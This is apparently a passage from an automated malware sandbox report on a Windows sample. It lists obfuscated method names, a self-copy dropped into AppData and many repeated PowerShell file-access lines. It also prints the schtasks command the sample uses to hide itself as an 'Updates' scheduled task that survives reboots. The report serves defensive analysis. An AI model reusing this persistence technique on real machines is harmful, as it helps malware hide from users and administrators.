                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, mRLBHK09Fp3QY0ak7q.csHigh entropy of concatenated method names: 'MXx4e40rdN', 'ddW4PMMBbF', 'ToString', 'POY4qZasLI', 'eRb4sF31xZ', 'RPt4BmAHVU', 'EpH4SCGiTK', 'vPL4vpSFMD', 'Ya54FlJ7ge', 'FCG4m8Q00U'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.csHigh entropy of concatenated method names: 'e7dJRtBUgK', 'fCRJqCbo8G', 'jsjJshsc8B', 'cr7JBTgHe3', 'HdIJShxpXw', 'y8oJvAAiXn', 'XJ6JFkbdPj', 'OosJmuELmr', 'gYHJgfUh1y', 'notJeYhq6Y'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, xotDjBAXlboKjPaFnk.csHigh entropy of concatenated method names: 'L7FXfSn3B2', 'BFZX1Bvxxt', 'rOCXQA7TsI', 'XiLXd0hvP5', 'PtFXo5mOSr', 'IxTXOtU2og', 'jvPXYc3X2v', 'w8uXCDjtSc', 'hAfXG81djO', 'OagX8qB51r'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, ioCwaGfdruCHidE4Gk.csHigh entropy of concatenated method names: 'ro0sp3E7V1', 'PkcsKtEUdg', 'h7rs2aNFIY', 'WYKs0H3GOI', 'X95sMlgLTl', 'JfdsipJOe3', 'qylstQGCJe', 'K2bsDkAGbd', 'Girs72Nlqu', 'AYvs6SRV0V'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, qA9VZV5DCST9Ms1x1F.csHigh entropy of concatenated method names: 'qeJSjcpaiT', 'CnqSUKDPGw', 'FiUBLBenJ7', 's0xBon9xTy', 'hpMBONRZ8A', 'sGwBHvyxkd', 'wJEBYRgP74', 'NLYBCX9HJS', 'wHrBrYqUjn', 'fLpBGQeZoD'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, bm5CM2bmHEx5Y3Jyjk.csHigh entropy of concatenated method names: 'h8GEBEMld', 'HNUaUbEQ3', 'nXXh5Hn77', 'VVqUdp8Ne', 'B2q15tYO9', 'MKa5A4ZwC', 'TohCtIX6CiuV3JUgNe', 'Q9ljoVY9bqIJoeGmOu', 'kFrTY7TZZ', 'DM4kf1AAc'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, VACZgDQrHT6F0vZlW0.csHigh entropy of concatenated method names: 'IsGvRKFFJU', 'AYYvsqma45', 'mblvSaU2lk', 'myovFLHEEi', 'k7dvmrmMwf', 'dc6SMCnTFl', 'zcnSiouQWj', 'faeSt9baOa', 'oJcSDflilm', 'o8TS7vNoCb'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, xXXA4etICI6j8ZrSoT.csHigh entropy of concatenated method names: 'FTZyldmSgw', 'DXey4Y3I7S', 'Bgcyydlnmi', 'v1nyVUgmXG', 'sqWynZDn3i', 'mNMycgX90a', 'Dispose', 'pU8TqBL5DB', 'Ao1TsnYuYK', 'xkETBuC5Fi'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, JI1copiplbLsacxPHL.csHigh entropy of concatenated method names: 'Gx34DdI2qK', 'uni46rS3uf', 'wGATuDGcgn', 'gftTwkmGsG', 'DxG48eDkG1', 'mCE4xnatTy', 'y7j4AlvwU0', 'tE64pbk4Qo', 'zNa4KSKIul', 'IY542DbkfF'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, fh8Df91GimkZMF1K1J.csHigh entropy of concatenated method names: 'QqkBanXbEM', 'gBIBhAFUsB', 'E1lBfyhTvq', 'OOGB1KDTMC', 'Fc3BlI35VY', 'olyBNfoS4o', 'eO8B47a1NS', 'euwBTAIHrh', 'sZMByj2XFx', 'EUYBk7LBdg'
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeFile created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
